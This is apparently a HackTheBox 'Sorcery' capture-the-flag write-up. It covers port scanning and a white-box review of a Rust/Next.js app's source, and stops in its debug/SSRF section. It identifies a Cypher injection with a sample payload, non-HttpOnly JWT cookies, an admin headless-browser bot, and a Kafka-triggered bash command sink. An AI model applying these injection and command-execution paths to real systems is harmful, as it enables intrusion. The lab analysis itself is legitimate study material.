RECON
Port Scan
$ rustscan -a $target_ip --ulimit 2000 -r 1-65535 -- -A -sC -Pn
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 79:93:55:91:2d:1e:7d:ff:f5:da:d9:8e:68:cb:10:b9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBfa7NkcG06jauyQoChLbmUKvvd6pkaufyqxTH7Lc0LeTfUmDv2PZsCeNM0mm6JytOdhIhsLONllRYME0Fizhjw=
| 256 97:b6:72:9c:39:a9:6c:dc:01:ab:3e:aa:ff:cc:13:4a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPzwgWWL8qvTI4EzWXUX7/aGWcm8W4pTGnFiqfVbeOeh
443/tcp open ssl/http syn-ack nginx 1.27.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://sorcery.htb/
|_http-server-header: nginx/1.27.1
| ssl-cert: Subject: commonName=sorcery.htb
| Issuer: commonName=Sorcery Root CA
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-31T02:09:11
| Not valid after: 2052-03-18T02:09:11
| MD5: c294:7d7a:2965:5c32:3dc9:b850:e2e5:0d9a
| SHA-1: 9d44:6d3d:5fb6:252c:da8b:3dd1:b5a2:aeb3:1e4b:5534
| -----BEGIN CERTIFICATE-----
| MIIEuTCCAqECFFDAAPGK7ud2DPpuM8BMaxLfK0U+MA0GCSqGSIb3DQEBCwUAMBox
| ...
| 4PPnLBiUeFv9xmOPvw==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
| http/1.0
|_ http/0.9
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelPort 443 is open for web service, so we can run whatweb to extract metadata:
$ whatweb https://sorcery.htb
https://sorcery.htb [307 Temporary Redirect] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.27.1], IP[10.129.113.32], RedirectLocation[/auth/login], Script, Title[Sorcery], UncommonHeaders[link], X-Powered-By[Next.js], nginx[1.27.1]
https://sorcery.htb/auth/login [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.27.1], IP[10.129.254.122], PasswordField[password], Script, Title[Sorcery], UncommonHeaders[x-nextjs-cache], X-Powered-By[Next.js], nginx[1.27.1]The root path / redirects to /auth/login (Next.js app):
- Title: Sorcery
- Headers:
X-Powered-By: Next.jsUncommonHeaders: x-nextjs-cache, link- TLS Cert: Custom CA (
Sorcery Root CA)
Port 443
We breach https://sorcery.htb/auth/login and uncover an open-source surface:

The presence of the admin account confirms username enumeration is in play:

Following the trail to https://git.sorcery.htb/nicole_sullivan/infrastructure unveils a publicly exposed Gitea repository, pinned at version 1.22.1:

This sets the tone: a white-box code audit mission, where entry hinges on known credentials, WebAuthn passkeys, or a seller-exclusive Registration Key:

WEB
Code Review
Since this is a Rust-based code review of a full-stack project, I'll deploy hooks (anchors) in the exploitation chain to reference key source files and technical breakdowns below.
You can skip the in-depth code spelunking and jump straight into the exploit paths via the anchored references. But if you're here to dissect the project itself to know how the exploit is going on in details — do read on.
Overview
The application is part of an open-source suite titled infrastructure, authored by nicole_sullivan. With source access wide open, this is a rare opportunity for clean, controlled white-box vulnerability hunting.
Let's pull down the full repo for local dissection:
GIT_SSL_NO_VERIFY=1 \
git clone https://git.sorcery.htb/nicole_sullivan/infrastructure.gitWith the full tree structure:
infrastructure
├── backend
│ ├── Cargo.lock
│ ├── Cargo.toml
│ ├── Dockerfile
│ ├── Rocket.toml
│ └── src
│ ├── api
│ │ ├── auth
│ │ │ ├── login.rs
│ │ │ └── register.rs
│ │ ├── auth.rs
│ │ ├── blog
│ │ │ └── get.rs
│ │ ├── blog.rs
│ │ ├── debug
│ │ │ └── debug.rs
│ │ ├── debug.rs
│ │ ├── dns
│ │ │ ├── get.rs
│ │ │ └── update.rs
│ │ ├── dns.rs
│ │ ├── products
│ │ │ ├── get_all.rs
│ │ │ ├── get_one.rs
│ │ │ └── insert.rs
│ │ ├── products.rs
│ │ ├── webauthn
│ │ │ ├── passkey
│ │ │ │ ├── finish_authentication.rs
│ │ │ │ ├── finish_registration.rs
│ │ │ │ ├── get.rs
│ │ │ │ ├── start_authentication.rs
│ │ │ │ └── start_registration.rs
│ │ │ └── passkey.rs
│ │ └── webauthn.rs
│ ├── api.rs
│ ├── db
│ │ ├── connection.rs
│ │ ├── initial_data.rs
│ │ ├── models
│ │ │ ├── post.rs
│ │ │ ├── product.rs
│ │ │ └── user.rs
│ │ └── models.rs
│ ├── db.rs
│ ├── error
│ │ └── error.rs
│ ├── error.rs
│ ├── main.rs
│ ├── state
│ │ ├── browser.rs
│ │ ├── dns.rs
│ │ ├── kafka.rs
│ │ ├── passkey.rs
│ │ ├── privileges.rs
│ │ └── webauthn.rs
│ └── state.rs
├── backend-macros
│ ├── Cargo.lock
│ ├── Cargo.toml
│ └── src
│ └── lib.rs
├── dns
│ ├── Cargo.lock
│ ├── Cargo.toml
│ ├── convert.sh
│ ├── docker-entrypoint.sh
│ ├── Dockerfile
│ ├── src
│ │ └── main.rs
│ └── supervisord.conf
├── docker-compose.yml
└── frontend
├── components.json
├── Dockerfile
├── next.config.mjs
├── package.json
├── package-lock.json
├── postcss.config.mjs
├── public
│ ├── next.svg
│ └── vercel.svg
├── src
│ ├── api
│ │ ├── client.ts
│ │ └── error.ts
│ ├── app
│ │ ├── auth
│ │ │ ├── layout.tsx
│ │ │ ├── login
│ │ │ │ ├── actions.tsx
│ │ │ │ └── page.tsx
│ │ │ ├── logout
│ │ │ │ └── route.tsx
│ │ │ ├── passkey
│ │ │ │ └── page.tsx
│ │ │ ├── register
│ │ │ │ ├── actions.tsx
│ │ │ │ └── page.tsx
│ │ │ └── tabs.tsx
│ │ ├── dashboard
│ │ │ ├── blog
│ │ │ │ └── page.tsx
│ │ │ ├── debug
│ │ │ │ ├── actions.tsx
│ │ │ │ ├── page-client.tsx
│ │ │ │ └── page.tsx
│ │ │ ├── dns
│ │ │ │ ├── actions.tsx
│ │ │ │ ├── page-client.tsx
│ │ │ │ └── page.tsx
│ │ │ ├── layout.tsx
│ │ │ ├── new-product
│ │ │ │ ├── actions.tsx
│ │ │ │ ├── page-client.tsx
│ │ │ │ └── page.tsx
│ │ │ ├── page.tsx
│ │ │ ├── profile
│ │ │ │ ├── actions.tsx
│ │ │ │ ├── page.tsx
│ │ │ │ └── passkey.tsx
│ │ │ ├── store
│ │ │ │ ├── all-tabs.tsx
│ │ │ │ ├── breadcrumbs.tsx
│ │ │ │ ├── page.tsx
│ │ │ │ └── [product]
│ │ │ │ ├── not-found.tsx
│ │ │ │ └── page.tsx
│ │ │ ├── tabs-inner.tsx
│ │ │ └── tabs.tsx
│ │ ├── favicon.ico
│ │ ├── globals.css
│ │ ├── layout.tsx
│ │ ├── page.tsx
│ │ └── providers.tsx
│ ├── components
│ │ ├── misc
│ │ │ └── theme-provider.tsx
│ │ └── ui
│ │ ├── alert.tsx
│ │ ├── breadcrumb.tsx
│ │ ├── button.tsx
│ │ ├── card.tsx
│ │ ├── checkbox.tsx
│ │ ├── form.tsx
│ │ ├── input.tsx
│ │ ├── label.tsx
│ │ ├── table.tsx
│ │ ├── tabs.tsx
│ │ ├── toaster.tsx
│ │ ├── toast.tsx
│ │ └── use-toast.ts
│ ├── entity
│ │ ├── dns-entry.ts
│ │ ├── post.ts
│ │ ├── product.ts
│ │ ├── user-server.ts
│ │ └── user.ts
│ ├── hooks
│ │ └── useAuth.tsx
│ ├── lib
│ │ └── utils.ts
│ └── protect
│ └── protect.tsx
├── tailwind.config.ts
└── tsconfig.json
44 directories, 123 filesWe now have unfiltered access to the full stack: Frontend powered by Next.js, Backend crafted in Rust with Rocket, and the glue — Infrastructure managed via Docker + Compose.
- The backend runs a Rocket-powered API, with Chromium woven in for dynamic rendering tasks.
- Feature set includes:
- WebAuthn authentication
- APIs for blog, products, DNS, debug, and auth
- Chromium is spawned from
state/browser.rs— a smoking gun for headless automation. - A suspicious debug route is exposed — likely unprotected or misused.
- Frontend runs on Next.js SSR, complete with dashboard logic, passkey login, a bundled API client, and notably, a
debugpage wired in.
This ecosystem screams XSS + headless browser — a playground for phishing payloads and post-XSS browser-based bot exploitation.
Docker
Dockerfile
From the Dockerfile, we can discover it installs chromium at line 36:
RUN apt-get install -y chromiumThis is extremely unusual in a backend container — might suggest:
- Headless browser automation (e.g., screenshotting, PDF rendering, or SSRF headless fetches)
- A bot admin feature like URL preview, phishing checker
This implies it could be vulnerable to phishing via for example XSS and SSRF.
Docker-compose
The docker-compose.yml of this application reveals the environment consists of backend services, internal utilities, and potential targets. The stack includes:
1. backend
Rust Rocket API service:
- Listens on
0.0.0.0, internal-only by default - Connected to
neo4j(port 7687) andkafka(port 9092) - Sensitive env vars:
SITE_ADMIN_PASSWORDDATABASE_*,KAFKA_BROKER
- Listening on port 8000
2. frontend
React/Next JS web app:
- Talks to backend via
API_PREFIX - Exposes port 3000, proxied via
nginx
3. neo4j
The graph database:
- Port 7687
- Used as main DB
- Auth via
${DATABASE_USER}:${DATABASE_PASSWORD}
This could be vulnerable to Cypher Injection if query is not properly sanitized.
4. kafka
Messaging broker:
- Broker for backend ↔
dns,mail_bot - Port 9092
If Kafka write access gained, we can trigger DNS or phishing logic.
5. dns
Worker service that updates DNS entries based on Kafka messages:
- Listens to Kafka
updatetopic - DNS entries are updated in memory via
serde_json::<Vec<DnsEntry>>
6. ftp
Anonymous FTP server
- Anonymous read access (
ANONYMOUS_ACCESS: true) - Serves certs from
/ftp/pub:RootCA.crt,RootCA.
- Leaked private key via FTP is highly dangerous if trusted CA
- Exposes port 21
7. gitea
Self-hosted Git service:
- Port 3000 internally
- Auth-controlled:
DISABLE_REGISTRATION=true
This is used by developers (e.g., nicole_sullivan) — can host secrets
8. mail_bot
Automated phishing bot
- Interacts with Mailhog and SMTP
- Phishing logic: looks for
EXPECTED_RECIPIENTfromMAILHOG_SERVER - Contains SMTP creds in env
Write a malicious email → possible phishing interaction triggered via Kafka?
9. nginx
All interaction to frontend/backend flows through this:
- TLS reverse proxy (443)
- Routes to:
frontend:3000gitea:3000
Main
The main.rs from the Backend runs graph database migration on boot:
async fn launch() -> _ {
let graph = GRAPH.get().await;
migrate(graph).await;
...
};It caches admin privilege level into global PRIVILEGES map:
{
let admin = User::get_by_username("admin".to_string()).await.unwrap();
PRIVILEGES
.lock()
.unwrap()
.privileges
.insert(admin.id, UserPrivilegeLevel::Admin);
}It limits headless Chromium sessions via MAX_SEMAPHORE_PERMITS env var:
let max_semaphore_permits = std::env::var("MAX_SEMAPHORE_PERMITS")
.map(|item| item.parse::<usize>().unwrap())
.unwrap_or(5);
...
rocket::build()
.manage(BrowserStore {
semaphore: Arc::new(Semaphore::new(max_semaphore_permits)),
})Passkey + WebAuthn Setup:
rocket::build()
...
.manage(PasskeyStore {
..Default::default()
})
.manage({
let rp_id = "sorcery.htb";
let rp_origin = Url::parse("https://sorcery.htb").unwrap();
let builder = WebauthnBuilder::new(rp_id, &rp_origin).expect("Webauthn builder");
WebauthnStore {
instance: Arc::new(Mutex::new(builder.build().expect("Webauthn build"))),
}Standard Kafka setup
let mut consumer = Consumer::from_hosts(vec![broker.clone()])
.with_topic(topic)
.with_group(group)
.with_fallback_offset(FetchOffset::Earliest)
.with_offset_storage(Some(GroupOffsetStorage::Kafka))
.create()
.unwrap_or_else(|_| panic!("Kafka consumer: {broker}"));GroupOffsetStorage::Kafka means offsets are tracked inside Kafka, shared per group.
Kafka is a message broker — basically, it's a system that lets different parts of an application send and receive data (called "messages") in real-time, like a chat server, but for machines.
Here, Kafka is used to send DNS records from somewhere into the backend.
Consumer Polling Thread:
thread::spawn(move || loop {
let Ok(message_sets) = consumer.poll() else {
continue;
};
for message_set in message_sets.iter() {
for message in message_set.messages() {
let Ok(entries) = serde_json::from_slice::<Vec<DnsEntry>>(message.value) else {
continue;
};
DNS.lock().unwrap().entries = entries;
}
consumer.consume_messageset(message_set).ok();This background thread constantly polls Kafka topic "get" for new messages. For each message it deserializes message.value into Vec<DnsEntry>. If valid, it overwrites the global in-memory DNS list
From
backend/state/dns.rs:Rust#[derive(Serialize, Deserialize, Debug, Clone)] pub struct DnsEntry { pub name: String, pub value: String, }This means the DNS entries coming from Kafka are just simple key-value pairs, like:
JSON[ { "name": "admin.sorcery.htb", "value": "127.0.0.1" }, { "name": "api.sorcery.htb", "value": "10.10.13.3" } ]So the Kafka stream lets the backend live-update fake DNS mappings.
This .mount(...) section defines the public API surface of the backend — each call maps a URL path prefix to a set of routes (endpoints) implemented in Rust:
.mount(
"/api/auth",
routes![api::auth::register::register, // User account creation
api::auth::login::login], // Issues JWT on password-based login
)
.mount(
"/api/product", // E-commerce–style endpoints
routes![
api::products::get_one::get_one, // GET /api/product/<id> — Get one
api::products::get_all::get_all, // GET /api/product — List all
api::products::insert::insert_product, // POST /api/product — Create new
],
)
.mount(
"/api/webauthn/passkey", // Handles WebAuthn passkey-based login and registration
routes![
api::webauthn::passkey::start_registration::start_registration,
api::webauthn::passkey::finish_registration::finish_registration,
api::webauthn::passkey::get::get,
api::webauthn::passkey::start_authentication::start_authentication,
api::webauthn::passkey::finish_authentication::finish_authentication,
],
)
.mount(
"/api/dns",
routes![api::dns::get::get_entries, // GET /api/dns — Shows current DNS entries
api::dns::update::update_dns,], // POST /api/dns — Updates them (if auth allows)
)
.mount("/api/debug", routes![api::debug::debug::port_data]) // POST /api/debug/port: Specify host, port, and raw data to send
.mount("/api/blog", routes![api::blog::get::get_blog_posts])The comments inside should explain everything.
Login
Frontend
Under frontend/src/hooks/useAuth.tsx we can discover it's authenticated with JWT token in cookie (link):
export async function maybeGetUserOnServer(): Promise<User | null> {
const jwt = cookies().get("token");
if (jwt) {
return User.fromJwt(jwt.value);
}
return null;
}Backend
At line 41, it verifies the password using Argon2 using stored hash from DB:
if Argon2::default()
.verify_password(
password.as_bytes(),
&PasswordHash::new(&user.password).unwrap(),
)From line 50, we know token is set to expire in 24 hours, and the claims include privilege level, username, and a passkey flag (set to false for now):
let claim = UserClaims {
id: user.id,
username: username.to_owned(),
privilege_level: user.privilege_level,
with_passkey: false,
only_for_paths: None,
exp: SystemTime::now()
.add(Duration::from_secs(60 * 60 * 24))
.duration_since(UNIX_EPOCH)
.unwrap()
.as_secs() as usize,
};Then it signs a JWT Token from line 62:
let token = encode(
&Header::default(),
&claim,
&EncodingKey::from_secret(JWT_SECRET.as_bytes()),
)
.unwrap();It uses HS256 by default (symmetric secret from JWT_SECRET). And the token is sent over unencrypted HTTP (.secure(false)), defined at line 62:
cookies.add(
Cookie::build(("token", token.clone()))
.path("/")
.secure(false)
.http_only(false),
);JavaScript in the browser can read the token (.http_only(false)), making it vulnerable to XSS
Finally, it returns the token also in the response body:
Ok(Json(Response { token }))Further increases exposure.
Register
Frontend
Under frontend/src/app/auth/register/page.tsx, we see registrationKey is optional on the frontend — it's only used if present and is passed to the backend:
const schema = z.object({
username: z.string().min(1),
password: z.string().min(1),
registrationKey: z.string().optional(),
});This suggests differentiated registration flows (e.g., normal user vs elevated roles like "seller").
It calls register():
const response = await register(username, password, registrationKey);From @/app/auth/register/actions (action.tsx):
export async function register(
username: string,
password: string,
registrationKey?: string,
): Promise<APIResponse<null>> {
const response = await API().post("auth/register", {
json: {
username,
password,
registrationKey,
},
});
return convertResponse(response);
}To verify user registration with registrationKey to perform role assignment or privilege elevation during account creation.
Backend
The register.rs uses strong password hashing and generates unique ID:
let hash = create_hash(&password)?;
let id = Uuid::new_v4().to_string(); Again, registration_key is optional:
#[derive(Deserialize, Validate)]
pub struct Request {
username: String,
password: String,
registration_key: Option<String>,
}If the provided registration_key exactly matches the value stored in REGISTRATION_KEY, the user becomes a Seller, defined at line 41:
privilege_level: if registration_key.is_some()
&& ®istration_key.unwrap() == REGISTRATION_KEY.get().await
{
UserPrivilegeLevel::Seller
} else {
UserPrivilegeLevel::Client
}Passkey
start_registration.rs
The backend/src/api/webauthn/ directory handles passkey-based authentication (FIDO2/WebAuthn).
start_registration.rs, handles the first step of WebAuthn (passkey) registration — generating and issuing a challenge to the frontend client:
struct Request {
#[validate(custom(function = "validate_username"))]
username: Option<String>,
}If username is not given, it falls back to guard.claims.username (from JWT).
From line 30, the code shows that we can interact with the POST /register/start API:
#[post("/register/start", format = "json", data = "<data>")]
pub async fn start_registration(
guard: RequireAuthentication,
data: Validated<Json<Request>>,
passkey_store: &State<PasskeyStore>,
webauthn_store: &State<WebauthnStore>,
)We must be logged in to access this endpoint — passkey registration is a secondary auth factor, not primary.
If a username is provided, it's used; otherwise, defaults to the logged-in user:
let username = username.as_ref().unwrap_or(&guard.claims.username);It then uses webauthn_rs to generate a secure challenge
start_passkey_registration(Uuid::from_str(&user.id).unwrap(), username, username, None)And tracks the pending registration challenge for the user (probably expires after timeout)
passkey_store.registrations.lock().unwrap().insert(user.id.clone(), state);finish_registration.rs
The finish_registration.rs endpoint finalizes the WebAuthn (passkey) registration process. It's the critical second half after the challenge is created in start_registration.rs.
Route:
#[derive(Deserialize)]
struct Request {
credential: RegisterPublicKeyCredential, // A full WebAuthn credential response
}to POST /register/finish:
#[post("/register/finish", format = "json", data = "<data>")]
pub fn finish_registration(
guard: RequireAuthentication,
passkey_store: &State<PasskeyStore>,
webauthn_store: &State<WebauthnStore>,
data: Json<Request>,
)Once the credential is verified, it's stored for the user in passkeys:
Ok(passkey) => {
registrations.remove(&guard.claims.id);
passkey_store
.passkeys
.lock()
.unwrap()
.insert(guard.claims.id, passkey);
Ok(Json(Response {}))
}start_authentication.rs
This start_authentication.rs endpoint handles the first step of WebAuthn login, where the server generates a challenge based on the user's registered passkey.
Input:
struct Request {
#[validate(custom(function = "validate_username"))]
username: String,
}to endpoint POST /authenticate/start:
#[post("/authenticate/start", format = "json", data = "<data>")]
pub async fn start_authentication(
data: Validated<Json<Request>>,
passkey_store: &State<PasskeyStore>,
webauthn_store: &State<WebauthnStore>,
)If the user doesn't exist → returns AppError::NotFound:
User::get_by_username(username.clone()).awaitf user exists but has no registered passkey, returns NotFound
let passkeys = passkey_store.passkeys.lock().unwrap();
let Some(passkey) = passkeys.get(&user.id) else {
return Err(AppError::NotFound);
};This prevents reusing/forging credential registration unless the session is active.
Validates the credential against the stored state with standard WebAuthn flows:
.finish_passkey_registration(&data.credential, state)Uses webauthn_rs to generate a WebAuthn RequestChallengeResponse
start_passkey_authentication(&[passkey.clone()])And challenge state is stored in PasskeyStore memory:
authentications.insert(user.id.clone(), state);finish_authentication.rs
The finish_authentication.rs route finalizes WebAuthn (passkey) login.
Input:
struct Request {
credential: PublicKeyCredential, // WebAuthn signed response
#[validate(custom(function = "validate_username"))]
username: String,
}To endpoint POST /authenticate/finish:
#[post("/authenticate/finish", format = "json", data = "<data>")]
pub async fn finish_authentication(
passkey_store: &State<PasskeyStore>,
webauthn_store: &State<WebauthnStore>,
data: Validated<Json<Request>>,
cookies: &CookieJar<'_>,
)The challenge (state) must have been stored in memory from /authenticate/start:
let mut authentications = passkey_store.authentications.lock().unwrap();Uses webauthn_rs to validate signature, challenge, and authenticator data:
let Some(state) = authentications.get(&user.id) else {
return Err(AppError::Unauthorized);
};
if let Err(error) = webauthn_store
.instance
.lock()
.unwrap()
.finish_passkey_authentication(&credential, state)
{
println!("{error}");
return Err(AppError::Unknown);
};Then follows a session cleanup to prevent reuse of old challenge state (no double submission):
authentications.remove(&user.id);After that, it generates a JWT token:
let claim = UserClaims {
id: user.id,
username: user.username.to_owned(),
privilege_level: user.privilege_level,
with_passkey: true,
only_for_paths: None,
exp: SystemTime::now()
.add(Duration::from_secs(60 * 60 * 24))
.duration_since(UNIX_EPOCH)
.unwrap()
.as_secs() as usize,
};
let token = encode(
&Header::default(),
&claim,
&EncodingKey::from_secret(jwt_secret),
)
.unwrap();Builds a JWT including:
id,username,privilege_levelwith_passkey: trueexp= 24 hours from now
Same logic as the one in login.rs — but this token marks the user as "passkey-authenticated" (with_passkey: true).
Again the JWT token is then added to the insecure session cookie:
cookies.add(
Cookie::build(("token", token.clone()))
.path("/")
.secure(false)
.http_only(false),
);Token sent over unencrypted HTTP (secure(false)) and can be accessed from JavaScript → XSS risk (http_only(false)).
Returns the JWT in the HTTP body:
Ok(Json(Response { token }))Even if the cookie was secured, this makes the token readable by JavaScript or XSS.
Products (SQLi)
get_all.rs
The get_all() endpoint under /api/product is allowed to be accessed via any logged in users, as at least UserPrivilegeLevel::Client or above (e.g., Seller, Admin):
pub async fn get_all(guard: RequireClient) It calls the database layer: Product::get_all() — gets all products from the DB:
Product::get_all()
.await
.into_iter()
.filter(|product| product.should_show_for_user(&guard.claims))
.collect()And filters each product using .should_show_for_user(...), passing the authenticated user's claims.
So, users only see products they are authorized to view.
get_one.rs
GET /api/product/<id> retrieves a single product by ID, but requires authentication as well:
pub async fn get_one(guard: RequireClient, id: &str)It performs explicit visibility checks before returning the product:
let product = match Product::get_by_id(id.to_owned()).await {
Some(product) => product,
None => return Err(AppError::NotFound),
};
if !product.should_show_for_user(&guard.claims) {
return Err(AppError::NotFound);
}Behavior:
- Looks up the product by ID (probably UUID or short string).
- If not found → returns
404 NotFound. - If found but the user isn’t allowed to view → also returns
404.
The
404 NotFoundresponse matters in our exploit.
However, is there any unsafe query building for Product::get_by_id()?
We can look up to know how query works, via a Rust procedural macro that generates functions like get_by_id in backend-macros/src/lib.rs at line 143:
let get_functions = fields.iter().map(|&FieldWithAttributes { field, .. }| {
let name = field.ident.as_ref().unwrap(); // e.g., "id", "username"
let type_ = &field.ty; // field type
let name_string = name.to_string(); // in our case, "id"
let function_name = syn::Ident::new(
&format!("get_by_{}", name_string), // creates Ident: get_by_id
proc_macro2::Span::call_site(),
);
quote! {
pub async fn #function_name(#name: #type_) -> Option<Self> {
let graph = crate::db::connection::GRAPH.get().await;
// [!] Vulnerable: Cypher Injection
let query_string = format!(
r#"MATCH (result: {} {{ {}: "{}" }}) RETURN result"#,
#struct_name, #name_string, #name
);
let row = match graph.execute(
::neo4rs::query(&query_string)
).await.unwrap().next().await {
Ok(Some(row)) => row,
_ => return None
};
Self::from_row(row).await
}
}
});This macro is vulnerable to Cypher Injection, specifically due to how the query is built:
let query_string = format!(
r#"MATCH (result: {} {{ {}: "{}" }}) RETURN result"#,
#struct_name, #name_string, #name
);The query uses format! to directly embed unescaped user input (#name) into the Cypher query string. That means if the input contains quotes or malicious Cypher code, it can break out of the query context and execute arbitrary Cypher.
For example:
get_by_id("someid\"}) RETURN 1 AS injected //--")This would produce:
MATCH (result: Product { id: "someid"}) RETURN 1 AS injected //--" }) RETURN resultThis changes the behavior of the query, potentially leaking data, bypassing auth, or even modifying the graph if used in write contexts.
JACKPOT.
insert.rs
insert.rs inserts a new product, then render it via a headless browser as an admin user.
But it is required role RequireSeller to access API POST /api/product/:
#[post("/", data = "<data>")]
pub async fn insert_product(
guard: RequireSeller,
browser_store: &State<BrowserStore>,
data: Json<Request>,
)It accepts name and description:
#[derive(Deserialize)]
struct Request {
name: String,
description: String,
}Then saves Product { name, description, ... } to DB:
let id = Uuid::new_v4().to_string();
let product = Product {
id: id.to_string(),
name: data.name.clone(),
description: data.description.clone(),
is_authorized: false,
created_by_id: guard.claims.id,
};
product.save().await;Launches Chromium headless browser as admin user via:
// Login as admin user
let user = User::get_by_username("admin".to_string()).await.unwrap();
let claim = UserClaims {
id: user.id,
username: user.username.to_owned(),
privilege_level: user.privilege_level,
with_passkey: true,
only_for_paths: Some(vec![
r"^\/api\/product\/[a-zA-Z0-9-]+$".to_string(),
r"^\/api\/webauthn\/passkey\/register\/start$".to_string(),
r"^\/api\/webauthn\/passkey\/register\/finish$".to_string(),
]),
exp: SystemTime::now()
.add(Duration::from_secs(60))
.duration_since(UNIX_EPOCH)
.unwrap()
.as_secs() as usize,
};
let token = encode(
&Header::default(),
&claim,
&EncodingKey::from_secret(JWT_SECRET.as_bytes()),
)
.unwrap();
// Lauches Chromium headless browser
tokio::task::spawn(async move {
// URL = INTERNAL_FRONTEND/dashboard/store/<product_id>, loaded by admin bot.
let url = format!("{}/dashboard/store/{}", &*INTERNAL_FRONTEND, product.id);
...
let browser = Browser::new(launch_options).unwrap();
let tab = browser.new_tab().unwrap();
tab.set_cookies(vec![CookieParam {
name: "token".to_string(),
value: token,
url: Some(INTERNAL_FRONTEND.clone()),
domain: None,
path: None,
secure: None,
http_only: Some(true),
same_site: None,
expires: None,
priority: None,
same_party: None,
source_scheme: None,
source_port: None,
partition_key: None,
}])
.unwrap();
tab.navigate_to(&url.clone()).unwrap();
};DB
user.rs
From the user.rs, we understand how user identities and privilege levels are modeled in this application.
The User struct is decorated with a procedural macro #[derive(Model)] from backend_macros, which generates useful query helpers like get_by_id() and get_by_username():
#[derive(Model, Debug, Deserialize)]
pub struct User {
pub id: String,
pub username: String,
pub password: String,
#[transient(fetch = "fetch_privilege_level", save = "save_privilege_level")]
pub privilege_level: UserPrivilegeLevel,
}The field privilege_level is not stored in the database. Instead, it's dynamically fetched and stored in memory through:
impl User {
pub fn fetch_privilege_level(id: String) -> UserPrivilegeLevel {
*PRIVILEGES
.lock()
.unwrap()
.privileges
.get(&id)
.unwrap_or(&UserPrivilegeLevel::Client)
}This reads the privilege from the global PRIVILEGES map, defaulting to Client if not found.
⚠️
User::get_by_id(user_input)orUser::get_by_username(user_input)are generated by theModelmacro and internally build Cypher queries. Ifuser_inputis not sanitized, Cypher Injection is possible.
The UserPrivilegeLevel is an Enum structure which maps numeric levels to roles:
#[derive(Clone, Copy, PartialOrd, PartialEq, Debug)]
pub enum UserPrivilegeLevel {
Client = 0,
Seller = 1,
Admin = 2,
}It includes a helper for converting integers into enum variants:
impl UserPrivilegeLevel {
const fn from_level(level: usize) -> Option<Self> {
match level {
0 => Some(Self::Client),
1 => Some(Self::Seller),
2 => Some(Self::Admin),
_ => None,
}
}
}This function is used internally during deserialization:
impl<'de> Deserialize<'de> for UserPrivilegeLevel {
fn deserialize<D>(deserializer: D) -> Result<Self, D::Error> {
let level = usize::deserialize(deserializer)?;
Ok(UserPrivilegeLevel::from_level(level).unwrap())
}
}Currently, this risk is mitigated because the User struct uses #[transient], preventing external input from setting privilege_level. However, if any other struct exposes UserPrivilegeLevel directly, this becomes a privilege escalation vector via crafted JSON payloads.
product.rs
The Product struct defines a single product entry in the application:
#[derive(Model, Serialize, Deserialize)]
pub struct Product {
pub id: String,
pub name: String,
pub description: String,
pub is_authorized: bool,
pub created_by_id: String,
}It uses the #[derive(Model)] macro (from backend_macros) — same as in User. This implies automatic generation of Cypher-based query functions like get_by_id() and get_all().
Access control (we mentioned earlier) is encapsulated in the method:
pub fn should_show_for_user(&self, claims: &UserClaims) -> bool {
self.is_authorized
|| claims.privilege_level == UserPrivilegeLevel::Admin
|| self.created_by_id == claims.id
}This allows visibility if:
- the product is explicitly marked as authorized, or
- the requester is an Admin, or
- the requester is the creator of the product.
This function is used in both:
get_all.rs— filters unauthorized results post-fetch.get_one.rs— blocks access to unauthorized product even if ID matches.
Dns (RCE)
get.rs
A request to GET /api/dns returns internal DNS entries stored in memory, when authenticated:
pub fn get_entries(_guard1: RequireAdmin, _guard2: RequirePasskey)Requires both:
RequireAdmin→ the JWT must haveprivilege_level = AdminRequirePasskey→ user must have authenticated using WebAuthn (with_passkey = true)
This is a high-privilege endpoint. Only admin+passkey users can access. The backend internally uses a shared DNS list (likely for host resolution), and admins can view it.
update.rs
Access to to POST /api/dns is also tightly restricted:
pub fn update_dns(
_guard1: RequireAdmin,
_guard2: RequirePasskey,
kafka_store: &State<KafkaStore>,
)It sends a raw Kafka message with value "/dns/convert.sh" to topic update:
let mut producer = kafka_store.producer.lock().unwrap();
match producer.send(&Record {
topic: "update",
partition: -1,
key: (),
value: "/dns/convert.sh".as_bytes(),
}) {
Ok(_) => Ok(Json(Response {})),
Err(_) => Err(AppError::Unknown),
}The DNS content update comes from some system reacting to the update Kafka topic, executing or processing /dns/convert.sh, which may be leaked via the /debug endpoint.
main.rs
This main.rs reveals an RCE sink of the entire DNS service.
It acts as a Kafka consumer-producer loop:
- Consumes from Kafka topic
update - Executes the message as a bash command
- After execution, it reads a file (
/dns/entries), parses it into a list ofEntryobjects, and - Publishes the updated entry list (as JSON) to topic
get
This line is the actual vulnerability at line 66:
let mut process = match Command::new("bash").arg("-c").arg(command).spawn()The command comes directly from the Kafka message value, received from the update topic — no validation or sanitization is performed..
This means any user who can produce a Kafka message to update can execute arbitrary shell commands in the dns container.
The execution flow starts at line 60.
It first consume a Kafka message from update:
let Ok(command) = str::from_utf8(message.value)→ If the payload is valid UTF-8, treat it as a bash command
Then execute that command:
Command::new("bash").arg("-c").arg(command).spawn()Read updated DNS entries from /dns/entries:
let config = fs::read_to_string("/dns/entries")Parse to Entry structs, serialize them into JSON:
let value = serde_json::to_string(&entries)Publish to Kafka get topic:
producer.send(&Record { topic: "get", ... })If you have Kafka write access, we can send a Kafka message to topic update with value:
bash -c 'touch /tmp/hacked'The dns container will execute the command, then read /dns/entries and push a new JSON list to the get topic.
Debug (SSRF)
We would definitely look into the how the debug endpoint works.
Frontend
Under frontend/src/app/dashboard/debug/page.tsx we see:
async function _DebugPage() {
return <DebugClientPage />;
}
export default async function DebugPage<T>(props: T) {
const Component = await requireAuth(_DebugPage, 2).then(requirePasskey);
return <Component {...props} />;
